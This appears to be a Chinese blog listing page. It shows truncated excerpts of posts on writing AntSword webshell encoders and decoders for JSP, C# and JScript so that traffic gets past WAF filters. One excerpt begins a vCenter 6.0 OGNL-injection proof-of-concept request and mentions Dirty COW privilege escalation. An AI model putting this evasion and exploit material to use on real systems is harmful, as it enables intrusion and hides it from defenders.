前言 Jsp的WebShell连接总会碰到WAF拦截yv66，属于是蚁剑JspWebShell的一个特征。 Jsp的编码器与解码器思路类似于C#。同时，在多参数传参的时候，蚁剑也默认加了随机前缀长度，因此只需考虑解决恶意类的特征问题，还是用之前的思路，拦哪换哪。 编码器 /** * jsp::base64替换编码器 * Create at: 202…

前言 因C#功能较新且执行逻辑为发送功能类，所以常规的解码器并不能直接使用。翻看功能类源码发现都内置了Base64返回结果的功能，但默认没有开启。 那么这里的思路为： 1、先重新编译C#的功能类，把 https://github.com/AntSwordProject/AntSword-Csharp-Template.git 下所有cs文件中的 t…

前言 Jscript就比较惨了，不像世界上最好的语言一样好写，默认的编码器跟PHP一样会暴露，还没有解码器。 而且Jscript并没有PHP那样的 ob_get_contents()，ob_end_clean()，ob_start()可以把输出缓存然后统一处理，Jscript的Response.Write是及时响应，类似于Chatgpt那样一个字一…

编码器 编码器核心参数 编码器的三个参数：pwd, data, ext data与pwd 蚁剑的编码器中，data是一个Object对象，此处可以简易理解为一种Key->Value形式。 data['_']是存放原始Payload的地方，正常使用需要将其取出赋给data[pwd]。 ext ext 参数是编码器扩展信息。目…

前言 众所周知，现在连WebShell，WebShell要免杀，流量要加密。 冰蝎、哥斯拉虽然提供了各种自带加密的WebShell，但特征基本都被收录了，对于脚本小子来说看不懂客户端的逻辑，也不会改WebShell。 于是，作为唯一能看懂WebShell写了什么的蚁剑就成为目前来看最好的选择。并且蚁剑提供了编码器与解码器去修改流量，总比先改客户端再…

FQDN 打点 vCenter6.0 这个版本较为特殊，用如下poc可以获取普通权限 提权用脏牛 GET /statsreport/ HTTP/1.1 Host: vcenter:443 Content-Type: %{(#_='multipart/form-data').(#[email protected]@DEFAU…